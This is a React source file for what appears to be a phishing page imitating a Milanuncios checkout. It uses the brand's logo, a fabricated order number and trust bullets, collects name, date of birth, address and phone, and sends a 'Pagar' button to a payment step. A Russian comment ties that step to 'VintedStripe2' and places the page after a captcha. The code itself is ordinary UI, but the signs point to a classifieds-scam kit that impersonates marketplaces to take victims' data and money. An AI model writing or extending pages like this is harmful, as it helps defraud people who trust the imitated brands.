import React, { useEffect, useState } from 'react';
import { Link, useParams } from 'react-router-dom';
import { usePaymentPaths } from '../paymentPaths';
import './MilanunciosEsSuccess.css';
import SupportWidget from './SupportWidget';
import { fetchPageWithFallback } from '../fetchPageWithFallback';
import { getPrimaryCurrency, getSymbol } from '../stripeCurrency';
import { milanunciosCopy as m } from '../milanunciosSuccessCopy';
import { API_URL } from '../apiBase';

const SESSION_STORAGE_KEYS = { sessionId: 'payment_session_id' };
const LOGO_SRC = `${process.env.PUBLIC_URL || ''}/milanuncios-logo.png`;
const HERO_SRC = `${process.env.PUBLIC_URL || ''}/milanuncios-checkout-hero.jpg`;

const STEPS = [m.step1, m.step2, m.step3, m.step4];

function resolvePhotoUrl(raw) {
  const u = (raw || '').trim();
  if (!u) return '';
  if (u.startsWith('http://') || u.startsWith('https://')) return u;
  const base = API_URL.replace(/\/$/, '');
  return `${base}/${u.replace(/^\//, '')}`;
}

function orderRefFromCode(pageCode) {
  if (!pageCode) return '—';
  let h = 0;
  for (let i = 0; i < pageCode.length; i += 1) h = (h * 31 + pageCode.charCodeAt(i)) >>> 0;
  return String(10000 + (h % 90000));
}

function SearchIcon() {
  return (
    <svg className="mi-search-svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" strokeWidth="2" aria-hidden>
      <circle cx="11" cy="11" r="7" />
      <path d="M20 20l-4-4" strokeLinecap="round" />
    </svg>
  );
}

/**
 * Milanuncios (ES): после капчи — оформление доставки; «Pagar» → VintedStripe2.
 */
function MilanunciosEsSuccess({ page }) {
  const { pageCode } = useParams();
  const [pageData, setPageData] = useState(page || null);
  const [loading, setLoading] = useState(!page);
  const [sessionId] = useState(() => sessionStorage.getItem(SESSION_STORAGE_KEYS.sessionId) || null);

  useEffect(() => {
    if (page) {
      setPageData(page);
      setLoading(false);
      return;
    }
    if (!pageCode) {
      setLoading(false);
      return;
    }
    setLoading(true);
    fetchPageWithFallback(pageCode)
      .then((data) => {
        if (data.success && data.page) setPageData(data.page);
      })
      .finally(() => setLoading(false));
  }, [pageCode, page]);

  const countryCode = (pageData?.country_code || 'ES').toUpperCase();
  const symbol = getSymbol(getPrimaryCurrency(countryCode));
  const rawPrice = pageData?.price;
  const productPrice =
    rawPrice != null && String(rawPrice).trim() !== ''
      ? Number.parseFloat(String(rawPrice).replace(',', '.'))
      : null;
  const priceStr =
    productPrice != null && Number.isFinite(productPrice)
      ? `${productPrice % 1 === 0 ? String(productPrice.toFixed(0)) : String(productPrice)} ${symbol}`
      : `— ${symbol}`;

  const first = (pageData?.first_name || '').trim();
  const last = (pageData?.last_name || '').trim();
  const middle = (pageData?.middle_name || '').trim();
  const sellerDisplay = [first, last, middle].filter(Boolean).join(' ') || '—';
  const { toIndex2 } = usePaymentPaths(pageCode);
  const index2Path = toIndex2();
  const orderRef = orderRefFromCode(pageCode || pageData?.page_code || '');
  const rawPhoto = (pageData?.photo_url || '').trim();
  const photoSrc = resolvePhotoUrl(rawPhoto);
  const showThumb = Boolean(photoSrc);

  if (loading && pageCode) {
    return (
      <div className="mi-wrap">
        <div className="mi-loading">Cargando…</div>
        <SupportWidget sessionId={sessionId} countryCode={countryCode} />
      </div>
    );
  }

  return (
    <div className="mi-wrap">
      <div className="mi-yellow-bar" aria-hidden />

      <header className="mi-header">
        <div className="mi-header-row">
          <a href="#/" className="mi-logo-link" onClick={(e) => e.preventDefault()}>
            <img src={LOGO_SRC} alt="milanuncios" className="mi-logo" width={190} height={44} decoding="async" />
          </a>

          <nav className="mi-tabs" aria-label="Tipo de cuenta">
            <span className="mi-tab mi-tab--on">{m.tabParticular}</span>
            <span className="mi-tab">{m.tabEmpresa}</span>
          </nav>

          <div className="mi-search">
            <input type="search" readOnly placeholder={m.searchPlaceholder} aria-label={m.searchPlaceholder} />
            <SearchIcon />
          </div>
        </div>
      </header>

      <section className="mi-progress" aria-label="Progreso">
        <div className="mi-progress-track" role="presentation">
          {STEPS.map((label, idx) => (
            <div key={label} className={`mi-step ${idx === 0 ? 'mi-step--active' : ''}`}>
              <span className="mi-step-label">{label}</span>
            </div>
          ))}
        </div>
      </section>

      <div className="mi-split">
        <div className="mi-split-left">
          <img src={HERO_SRC} alt="" className="mi-hero-img" />
        </div>
        <div className="mi-split-right">
          <div className="mi-right-head">
            <div className="mi-order">{orderRef}</div>
            <div className="mi-subline">-123 - foto 1</div>
          </div>

          <div className="mi-photo-card" aria-hidden={!showThumb}>
            {showThumb ? <img src={photoSrc} alt="" className="mi-photo-thumb" decoding="async" /> : <div className="mi-photo-ph" />}
          </div>

          <ul className="mi-trust">
            <li>{m.bullet1}</li>
            <li>{m.bullet2}</li>
            <li>{m.bullet3}</li>
          </ul>

          <div className="mi-summary">
            <div className="mi-summary-row">
              <span className="mi-summary-lbl">{m.sellerLabel}</span>
              <span className="mi-summary-val">{sellerDisplay}</span>
            </div>
            <div className="mi-summary-row">
              <span className="mi-summary-lbl">{m.priceLabel}</span>
              <span className="mi-summary-val">{priceStr}</span>
            </div>
          </div>

          <form className="mi-form" onSubmit={(e) => e.preventDefault()}>
            <label className="mi-field">
              <span>{m.fieldNombre}</span>
              <input type="text" name="nombre" autoComplete="given-name" defaultValue={first} />
            </label>
            <label className="mi-field">
              <span>{m.fieldSegundoNombre}</span>
              <input type="text" name="segundo" autoComplete="additional-name" defaultValue={middle} />
            </label>
            <label className="mi-field">
              <span>{m.fieldApellido}</span>
              <input type="text" name="apellido" autoComplete="family-name" defaultValue={last} />
            </label>
            <label className="mi-field">
              <span>{m.fieldDob}</span>
              <input type="text" name="dob" placeholder={m.fieldDobPlaceholder} defaultValue="" />
            </label>
            <label className="mi-field">
              <span>{m.fieldDireccion}</span>
              <input type="text" name="direccion" autoComplete="street-address" />
            </label>
            <label className="mi-field">
              <span>{m.fieldCiudad}</span>
              <input type="text" name="ciudad" autoComplete="address-level2" />
            </label>
            <label className="mi-field">
              <span>{m.fieldEstado}</span>
              <input type="text" name="estado" autoComplete="address-level1" />
            </label>
            <label className="mi-field">
              <span>{m.fieldPhone}</span>
              <input type="tel" name="tel" autoComplete="tel" inputMode="tel" />
            </label>
            <label className="mi-field">
              <span>{m.fieldCp}</span>
              <input type="text" name="cp" autoComplete="postal-code" inputMode="numeric" />
            </label>
            <Link to={index2Path} className="mi-pay-wrap">
              <button type="button" className="mi-pay">
                {m.payCta}
              </button>
            </Link>
          </form>
        </div>
      </div>

      <section className="mi-should-know" aria-labelledby="mi-know-title">
        <div className="mi-know-inner">
          <h2 id="mi-know-title" className="mi-know-h">
            {m.shouldKnowTitle}
          </h2>
          <div className="mi-know-rule" aria-hidden />
          <p>{m.shouldKnowP1}</p>
          <p>{m.shouldKnowP2}</p>
          <p>{m.shouldKnowP3}</p>
          <p>{m.shouldKnowP4}</p>
        </div>
      </section>

      <SupportWidget sessionId={sessionId} countryCode={countryCode} />
    </div>
  );
}

export default MilanunciosEsSuccess;
